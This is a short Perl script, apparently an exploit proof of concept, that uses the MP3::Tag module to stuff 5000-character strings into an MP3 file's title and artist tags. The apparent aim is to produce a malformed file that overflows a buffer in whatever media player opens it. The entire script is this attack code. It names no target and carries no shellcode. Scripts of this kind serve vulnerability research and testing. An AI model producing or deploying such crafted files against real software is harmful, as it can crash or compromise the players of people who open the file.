use MP3::Tag;
$mp3 = MP3::Tag->new('legit.mp3'); # whatever mp3 you got handy
$mp3->title_set('A' x 5000); # title/artist tags
$mp3->artist_set('A' x 5000); # may vary although both seems to be needed
$mp3->update_tags();
$mp3->close();
print "[*] Completed.\n";